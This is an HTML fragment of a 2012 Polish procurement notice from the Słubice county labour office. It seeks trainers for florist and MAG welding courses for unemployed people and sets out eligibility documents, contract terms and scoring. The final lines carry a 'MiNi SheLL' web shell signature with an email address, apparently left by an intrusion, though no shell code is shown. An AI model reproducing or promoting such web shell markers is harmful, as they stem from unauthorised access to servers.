<ul class="kh_indent_1"><li><p>Spełnienie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oceniane będzie na podstawie  oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp -  załącznik nr 2.
2)	 Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 3.                             
3)	 Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych co najmniej 3  usług szkoleniowych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie - załącznik nr 4.
Za dokumenty potwierdzające Zamawiający przyjmie: referencje, rekomendacje, listy polecające, a także inne dokumenty, z których treści wynika, że przedstawione w wykazie usługi zostały wykonane należycie.
4)	Wykaz narzędzi, materiałów, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług, w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Opis sal wykładowych wraz z opisem warunków lokalowych i wyposażenia, jakimi dysponuje lub będzie dysponował Wykonawca - załącznik nr 5. 
 	Opis musi wykazać, że sale, którymi dysponuje Wykonawca spełniają następujące warunki:
a)	ich powierzchnia gwarantuje swobodne poruszanie się uczestników szkolenia,
b)	spełniają wymogi BHP i PPoż,
c)	są odpowiednio oświetlone co oznacza, że natężenie oświetlenia na stanowisku szkoleniowym musi być zgodne z parametrami określonymi w Polskich Normach,
d)	posiadają okna zewnętrzne,
e)	posiadają odpowiednią do liczby uczestników szkolenia, liczbę stołów i krzeseł,
f)	posiadają zaplecze sanitarne oraz wydzielone miejsce do spożywania posiłków.
Wyżej wymienione dokumenty muszą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę,osoby uprawnioną do podpisania oferty  z  dopiskiem za zgodność z oryginałem odrębnie dla każdego przedmiotu zamówienia.
Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 i braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust.1 i 2 ustawy Pzp -  załącznik nr 2. 
1)	Formularz ofertowy - z wykorzystaniem wzoru - załącznik nr 1. 
2)	Szacowana specyfikacja kosztów szkolenia - załącznik nr 6.
3)	Program szkolenia opracowany zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14.09.2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy oraz z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych - załącznik nr 7.
4)	Certyfikat jakości usług (jeżeli wykonawca posiada). Certyfikat może dotyczyć zarówno tematyki szkolenia, na które Wykonawca złoży ofertę, jak również Wykonawcy, jako instytucji szkoleniowej świadczącej usługi szkoleniowe.
5)	W przypadku ustanowienia pełnomocnika, wymagany jest dokument pełnomocnictwa, wskazujący pełnomocnika wraz z zakresem jego umocowania w niniejszym postępowaniu, w oryginale lub w kopii potwierdzonej notarialnie. Pełnomocnictwo winno być wystawione nie wcześniej niż z datą ogłoszenia niniejszego zamówienia.
Wyżej wymienione dokumenty muszą być złożone w formie oryginałów lub kserokopii   potwierdzonych za zgodność przez osobę,osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem odrębne dla każdego przedmiotu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	Zamawiający dopuszcza wprowadzanie zmian w treści umowy, jednak wyłącznie za zgodą Zamawiającego i na zasadach wynikających z umowy, niniejszego punktu SIWZ i tym samym art. 144 ustawy Pzp. Zamawiający dopuszcza dokonanie istotnych zmian w umowie w stosunku do treści oferty, w niżej opisanych przypadkach, gdy: 
1) wystąpi zmiana przepisów prawa istotnych dla realizacji przedmiotu umowy, mająca wpływ na zakres lub termin wykonania przedmiotu umowy - zmianie może ulec zakres lub termin realizacji umowy; 
2) zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy - zmianie może ulec termin realizacji umowy lub jej zakres; 
3) zaistnieje konieczność zmiany osoby przewidzianej do wykonania zamówienia w zakresie prowadzonych przez daną osobę zajęć, wskazanej przez Wykonawcę w załączniku nr 3 do SIWZ - dotychczasowa osoba zostanie zastąpiona nową osobą, pod warunkiem wykazania przez Wykonawcę, iż posiada ona kwalifikacje oraz doświadczenie co najmniej odpowiadające doświadczeniu i kwalifikacjom osoby pierwotnie przewidzianej do realizacji zamówienia w zakresie opisanym przez Zamawiającego na etapie postępowania o udzielenie niniejszego zamówienia publicznego; 
W przypadku wystąpienia okoliczności, uprawniającej Wykonawcę do żądania zmiany umowy w zakresie wyżej wymienionym, Wykonawca zobowiązany jest niezwłocznie zawiadomić Zamawiającego, oraz złożyć stosowny wniosek na piśmie do Zamawiającego, w terminie nie później niż 7 dni od daty wystąpienia zdarzenia, z podaniem wszelkich okoliczności mających wpływ na realizację przedmiotu umowy ze wskazaniem proponowanego terminu realizacji przedmiotu umowy oraz ze szczegółowym i wyczerpującym uzasadnieniem przyczyny. 
Zmiany umowy, o których mowa powyżej muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy Pzp, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ.
Dokonanie zmian, o których mowa wyżej wymaga podpisania aneksu do umowy. Zamawiający zawiadomi w formie pisemnej Wykonawcę o zaistnieniu przesłanek do wprowadzenia zmiany i wezwie Wykonawcę do zawarcia aneksu do umowy w terminie ustalonym przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupslubice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Słubicach
ul. Piłsudskiego 19
69-100 Słubice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 09:00, miejsce: Powiatowy Urząd Pracy
ul Piłsudskiego 19, 69-100 Słubice
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pierwsze zadanie częściowe dotyczy przeprowadzenia szkolenia grupowego dla 8 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach w zakresie szkolenia Florysta..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usługi szkoleniowej w zakresie: Florysta dla 8 osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach finansowanego ze środków Funduszu Pracy w ramach Rezerwy Ministra.
Wspólny słownik zamówień CPV 80530000-8 - Usługi szkolenia zawodowego.
2) Program szkolenia powinien być opracowany w oparciu o standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez Departament Rynku Pracy Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl). 
3) Celem szkolenia jest uzyskanie umiejętności zawodowych w zakresie pracy florysty jako specjalisty w zakresie kreatywnego tworzenia dekoracji roślinnych różnego typu. Do głównych zadań florysty należą: opracowywanie projektów dekoracji roślinnych, tworzenie różnych form kompozycji roślinnych, przygotowywanie kompleksowego wystroju wnętrz oraz otwartej przestrzeni z użyciem materiału roślinnego. Zawód florysty wymaga interdyscyplinarnego przygotowania począwszy od strony historyczno-estetycznej dekoracji, wiedzy o stosowanych materiałach roślinnych i technicznych, aż po szeroki zakres wiedzy i umiejętności niezbędnych do tworzenia projektów dekoracji roślinnych na różne okazje oraz do ich realizacji. Po zakończeniu szkolenia w zakresie danej jednostki modułowej uczestnik szkolenia powinien nabyć minimum następujące umiejętności:
­	planowanie i organizowanie pracy własnej (w tym prowadzenie działalności gospodarczej) i podległych pracowników,
­	organizowanie zaopatrzenia w materiał roślinny i nieroślinny, wdrażanie nowości florystycznych.
­	pozyskiwanie zleceń na wykonanie dekoracji florystycznych,
­	prowadzenie promocji kwiatów i dekoracji florystycznych,
­	przygotowywanie materiałów roślinnych i nieroślinnych do ekspozycji, wykonywania różnego rodzaju wyrobów florystycznych i ich sprzedaży,
­	planowanie i wykonywanie projektów,
­	wykonywanie różnego rodzaju wyrobów florystycznych z materiałów roślinnych i nieroślinnych,
­	pielęgnowanie roślin ciętych, doniczkowych i gotowych dekoracji florystycznych,
­	dekorowanie różnych wnętrz i powierzchni zewnętrznych roślinami ciętymi i doniczkowymi,
­	sprzedaż, obsługa klienta i udzielanie porad dotyczących roślin ciętych, kwiatów doniczkowych i dekoracji florystycznych,
­	pakowanie i przygotowywanie do transportu i/lub przechowywania roślin ciętych, doniczkowych oraz gotowych wyrobów florystycznych,
­	konserwowanie/suszenie roślin różnymi metodami,
­	nadzorowanie i kierowanie pracą podległych osób, realizujących zadania,
­	uczestniczenie w procesie doskonalenia zawodowego,
­	zapewnianie jakości wyrobów florystycznych i przestrzeganie określonych procedur ich wykonania,
­	ocena jakości wykonanych dekoracji,
­	zabezpieczanie miejsca pracy oraz sprzętu i narzędzi do/po pracy.
4) Program szkolenia musi być zrealizowany w łącznym wymiarze 100 godzin zegarowych przypadających na każdego uczestnika szkolenia łącznie z niezbędnymi egzaminami. Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny. Przerwy wliczają się w łączny czas trwania szkolenia, a elastyczny sposób organizowania przerw ma na celu dostosowanie godzin szkolenia do higieny nauczania, tj. ustalenia dopuszczalnych norm obciążenia nauką uczestników szkolenia, higienicznych metod nauczania z uwzględnieniem poszczególnych rodzajów zajęć oraz przeciwdziałanie zjawisku przemęczenia. Nie dopuszcza się skracania zajęć.
5) Kurs powinien być zrealizowany w ciągu maksymalnie 32 dni kalendarzowych, przy czym tygodniowy wymiar zajęć musi wynosić przeciętnie nie mniej niż 25 godzin, chyba że przepisy odrębne przewidują niższy wymiar szkolenia, natomiast dzienny wymiar zajęć nie może przekroczyć 8 godzin zegarowych.
6) Zajęcia muszą odbywać się w dni powszednie od poniedziałku do piątku z wyłączeniem dni wolnych od pracy w przedziale czasowym dostosowanym do możliwości dojazdu osób bezrobotnych po uprzedniej akceptacji Zamawiającego. 
7) Wykonawca w opisie warunków szkolenia winien dokładnie podać miejsce realizacji zajęć teoretycznych oraz praktycznych i w sposób szczegółowy opisać wyposażenie poszczególnych sal, w których prowadzone będą zajęcia dydaktyczne. W przypadku zajęć praktycznych należy wymienić ilość i rodzaj sprzętu oraz materiałów jakie będą wykorzystywane podczas zajęć. Wykonawca winien zapewnić każdemu uczestnikowi szkolenia swobodny dostęp do sprzętu i materiałów oraz samodzielne stanowisko pracy.
8) Wykonawca zapewni nieodpłatnie uczestnikom szkolenia napoje (gorące i zimne) podczas przerw.
9) Wykonawca zapewni w trakcie trwania szkolenia warunki zgodne z przepisami bezpieczeństwa 
i higieny pracy. Pomieszczenia, w których realizowane będą zajęcia szkoleniowe winny być bezwzględnie dostosowane do prowadzenia zajęć dla grupy minimum 8 osobowej. Wykonawca musi dla każdego uczestnika szkolenia zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek.
10) Wykonawca zapewni wszystkim uczestnikom szkolenia na własność materiały szkoleniowe wspomagające tematykę szkolenia oraz materiały do robienia notatek (zeszyt i długopis).
11) Wykonawca musi przedstawić do przeprowadzenia szkolenia lokal w Ośnie Lubuskim, w woj. lubuskim, który znajduje się w miejscu umożliwiającym dogodny dojazd środkami komunikacji publicznej lub dojście na pieszo.
12) Wykonawca zapewni, że siedziba w której ma być przeprowadzone szkolenie zapewnia odpowiednie warunki sanitarne, bezpieczeństwa i jakościowe, zgodnie z obowiązującymi przepisami, zapewni nadzór wewnętrzny i stały kontakt w miejscu szkolenia z osobą odpowiedzialną za obsługę szkolenia wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
13) Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie stałej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób napotykających trudności w procesie nauczania. Dlatego w programie szkolenia w punkcie dotyczącym sposobów sprawdzania efektów szkolenia Wykonawca winien precyzyjnie określić w jaki sposób zamierza spełnić niniejsze zobowiązanie. 
14) W celu zapewnienia nadzoru wewnętrznego służącego podnoszeniu jakości szkolenia wymagane jest, aby Wykonawca wyznaczył osobę, która będzie sprawować stały, bezpośredni nadzór nad jakością realizowanego szkolenia oraz współpracować z Powiatowym Urzędem Pracy. Wyznaczona osoba powinna w sposób ciągły nadzorować przebieg szkolenia, kontrolować umiejętności i wiedzę słuchaczy uzyskiwaną podczas szkolenia poprzez przeprowadzanie testów i ćwiczeń praktycznych i innych sprawdzających czynności. Wszystkie przewidziane sprawdziany, egzaminy oraz inne formy sprawdzenia wiedzy i umiejętności prowadzące do uzyskania zaświadczeń wskazanych w pkt. 15 niniejszej SIWZ muszą być wliczone w całościowy koszt szkolenia. 
15) Szkolenie musi zakończyć się wydaniem stosownego zaświadczenia o ukończeniu kursu wg wzoru zgodnego z rozporządzeniem Ministra Edukacji Narodowej z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012 poz. 186) zgodnie ze wzorem określonym w załączniku nr 6 do projektu umowy szkoleniowej w zakresie zadania częściowego nr 1  oraz wydaniem zaświadczenia o uczestnictwie w szkoleniu zgodnym z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010 r., nr 177, poz. 1193 z późn. zm.) zgodnie ze wzorem określonym w załączniku nr 5 do projektu umowy szkoleniowej w zakresie zadania częściowego nr 1. 
16) Wykonawca szkolenia zobowiązany jest do umieszczenia informacji o realizowanym szkoleniu na stronie www.inwestycjawkadry.pl, w terminie do 3 dni od daty zawarcia umowy oraz dokonywania aktualizacji tej informacji co najmniej raz w miesiącu. Wykonawca szkolenia jest także zobowiązany do przedłożenia Zamawiającemu potwierdzenia w formie pisemnej z podpisem przedstawiciela lub pełnomocnika zamieszczonej w/w informacji i każdej  jej aktualizacji w ciągu 3 dni od zamieszczenia 
i zaktualizowania.
17) Zamawiający nie dopuszcza realizacji zamówienia przez podwykonawców. Wykonawca nie jest obowiązany ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków, dlatego też nie należy kosztów ubezpieczenia wliczać w cenę wykonania usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej, która będzie uczestniczyć w realizacji zamówienia - 20</li>
<li>3. Wyposażenie w sprzęt - 15</li>
<li>4. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drugie zadanie częściowe dotyczy przeprowadzenia szkolenia grupowego dla 8 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach w zakresie Spawacz metodą MAG. Szkolenia finansowane są ze środków Funduszu Pracy w ramach Rezerwy Ministra..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.	Zadanie częściowe nr 2:
1)	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usługi szkolenia w zakresie: Spawacz metodą MAG dla 8 osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach finansowanego ze środków Funduszu Pracy w ramach Rezerwy Ministra.
Wspólny słownik zamówień CPV 80530000-8 - Usługi szkolenia zawodowego.
2)	Program szkolenia powinien być opracowany w oparciu o standardy kwalifikacji zawodowych 
i modułowe programy szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez Departament Rynku Pracy Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl). 
3)	Celem szkolenia jest praktyczne i teoretyczne przygotowanie uczestników szkolenia do wykonywania zawodu spawacza, tj. spawanie łukiem elektrycznym w osłonie aktywnych chemicznie gazów lub mieszanek gazowych elektrodą topliwą proste elementy konstrukcyjne wykonane ze stali niskowęglowej, wykorzystując do tego celu urządzenia do spawania w atmosferze gazów i półautomaty spawalnicze; posługuje się narzędziami ślusarskimi oraz przyrządami kontrolno-pomiarowymi. Po zakończeniu szkolenia uczestnik szkolenia powinien nabyć minimum następujące umiejętności:
­	bezpieczeństwo i higiena pracy przy spawaniu elektrycznym,
­	ochrona przeciwpożarowa prac spawalniczych,
­	czytanie i sporządzanie rysunku technicznego,
­	ulepszanie cieplne złączy spawanych,
­	dobór materiałów do spawania metodą MAG,
­	eksploatacja butli do gazów technicznych,
­	pomiary ciśnienia w zbiornikach,
­	obsługa reduktorów,
­	przygotowanie brzegów elementów do spawania,
­	wady połączeń spawalniczych,
­	kontrola złączy spawanych,
­	uruchomienie i obsługa stanowiska do spawania łukowego elektrodą topliwą w osłonie aktywnych, chemicznie gazów lub mieszanek gazowych - metodą MIG/MAG,
­	wykonanie złączy narożnych spoiną pachwinową metodą MAG,
­	wykonanie złączy doczołowych spoiną czołową bez ukosowania w pozycji podolnej A1 metodą MAG,
­	wykonanie złączy teowych spoiną pachwinową jedno- i dwustronną w pozycji nabocznej B1 metodą MAG,
­	wykonanie złączy doczołowych z ukosowaniem na Y w pozycji podolnej A1 metodą MAG,
­	wykonanie złączy doczołowych z ukosowaniem na Y w pozycji pionowej A4 metodą MAG,
­	wykonanie złączy doczołowych z ukosowaniem na 1/2 V w pozycji naściennej A2 metodą MAG,
­	wykonanie złączy teowych spoiną pachwinową jedno- i dwustronną w pozycji pionowej B4, metodą MAG.4. 
4)	Program szkolenia musi być zrealizowany w łącznym wymiarze 135 godzin zegarowych przypadających na każdego uczestnika szkolenia łącznie z niezbędnymi egzaminami. Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut. Przerwy wliczają się w łączny czas trwania szkolenia, a elastyczny sposób organizowania przerw ma na celu dostosowanie godzin szkolenia do higieny nauczania, tj. ustalenia dopuszczalnych norm obciążenia nauką uczestników szkolenia, higienicznych metod nauczania z uwzględnieniem poszczególnych rodzajów zajęć oraz przeciwdziałanie zjawisku przemęczenia. Nie dopuszcza się skracania zajęć.
5)	Kurs powinien być zrealizowany w ciągu  maksymalnie 40 dni kalendarzowych, przy czym tygodniowy wymiar zajęć musi wynosić przeciętnie nie mniej niż 25 godzin, chyba że przepisy odrębne przewidują niższy wymiar szkolenia, natomiast dzienny wymiar zajęć nie może przekroczyć 8 godzin zegarowych.
6)	Zajęcia muszą odbywać się w dni powszednie od poniedziałku do piątku z wyłączeniem dni wolnych od pracy w przedziale czasowym dostosowanym do możliwości dojazdu osób bezrobotnych po uprzedniej akceptacji Zamawiającego. 
7)	Wykonawca w opisie warunków szkolenia winien dokładnie podać miejsce realizacji zajęć teoretycznych oraz praktycznych i w sposób szczegółowy opisać wyposażenie poszczególnych sal, w których prowadzone będą zajęcia dydaktyczne. W przypadku zajęć praktycznych Wykonawca musi dysponować salą wyposażoną w minimum 8 stanowisk, natomiast w ramach prowadzonych zajęć praktycznych Wykonawca winien zapewnić uczestnikom szkolenia swobodny dostęp do sprzętu, przy czym na jednym stanowisku spawalniczym szkolić się będą maksymalnie dwie osoby. W przypadku zajęć praktycznych należy wymienić ilość i rodzaj sprzętu i urządzeń jakie będą wykorzystywane podczas zajęć.
8)	Wykonawca zapewni nieodpłatnie uczestnikom szkolenia napoje (gorące i zimne) podczas przerw.
9)	Wykonawca zapewni w trakcie trwania szkolenia warunki zgodne z przepisami bezpieczeństwa 
i higieny pracy. Pomieszczenia, w których realizowane będą zajęcia szkoleniowe winny być bezwzględnie dostosowane do prowadzenia zajęć dla grupy minimum 8 osobowej. Wykonawca musi dla każdego uczestnika szkolenia zagwarantować miejsce siedzące (stolik lub ławkę bądź krzesło 
z przystawką) umożliwiające swobodne sporządzanie notatek.
10)	Wykonawca zapewni wszystkim uczestnikom szkolenia na własność materiały szkoleniowe wspomagające tematykę szkolenia oraz materiały do robienia notatek (zeszyt i długopis).
11)	Wykonawca musi przedstawić do przeprowadzenia szkolenia lokal w Słubicach, w woj. lubuskim, który znajduje się w miejscu umożliwiającym dogodny dojazd środkami komunikacji publicznej lub dojście na pieszo.
12)	Wykonawca zapewni, że siedziba w której ma być przeprowadzone szkolenie zapewnia odpowiednie warunki sanitarne, bezpieczeństwa i jakościowe, zgodnie z obowiązującymi przepisami, zapewni nadzór wewnętrzny i stały kontakt w miejscu szkolenia z osobą odpowiedzialną za obsługę szkolenia wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
13)	Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie stałej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób napotykających trudności w procesie nauczania. Dlatego w programie szkolenia w punkcie dotyczącym sposobów sprawdzania efektów szkolenia Wykonawca winien precyzyjnie określić w jaki sposób zamierza spełnić niniejsze zobowiązanie. 
14)	W celu zapewnienia nadzoru wewnętrznego służącego podnoszeniu jakości szkolenia wymagane jest, aby Wykonawca wyznaczył osobę, która będzie sprawować stały, bezpośredni nadzór nad jakością realizowanego szkolenia oraz współpracować z Powiatowym Urzędem Pracy. Wyznaczona osoba powinna w sposób ciągły nadzorować przebieg szkolenia, kontrolować umiejętności i wiedzę słuchaczy uzyskiwaną podczas szkolenia poprzez przeprowadzanie testów i ćwiczeń praktycznych i innych sprawdzających czynności. Wszystkie przewidziane sprawdziany, egzaminy oraz inne formy sprawdzenia wiedzy i umiejętności prowadzące do uzyskania zaświadczeń wskazanych w pkt. 15 niniejszej SIWZ muszą być wliczone w całościowy koszt szkolenia.
15)	Szkolenie musi zakończyć się egzaminem państwowym oraz wydaniem stosownych dokumentów świadczących o ukończeniu szkolenia oraz nabytych umiejętnościach tj.  świadectwo egzaminu spawacza oraz Książka spawacza zgodne z rozporządzeniem Ministra Gospodarki z dnia 27 kwietnia 2000 r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. z 2000 r. Nr 40, poz. 470 z późn. zm.) oraz wydaniem zaświadczenia o uczestnictwie w szkoleniu zgodnego z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z 2010r z późn. zm.) zgodnie ze wzorem określonym w załączniku nr 5  do projektu umowy szkoleniowej w zakresie zadania częściowego nr 2.
16)	Wykonawca szkolenia zobowiązany jest do umieszczenia informacji o realizowanym szkoleniu na stronie www.inwestycjawkadry.pl, w terminie do 3 dni od daty zawarcia umowy oraz dokonywania aktualizacji tej informacji co najmniej raz w miesiącu. Wykonawca szkolenia jest także zobowiązany do przedłożenia Zamawiającemu potwierdzenia w formie pisemnej z podpisem przedstawiciela lub pełnomocnika zamieszczonej w/w informacji i każdej  jej aktualizacji w ciągu 3 dni od zamieszczenia i zaktualizowania.
17)	Zamawiający nie dopuszcza realizacji zamówienia przez podwykonawców. Wykonawca nie jest obowiązany ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków, dlatego też nie należy kosztów ubezpieczenia wliczać w cenę wykonania usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej, która będzie uczestniczyć w realizacji zamówienia - 20</li>
<li>3. Wyposażenie w sprzęt - 15</li>
<li>4. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com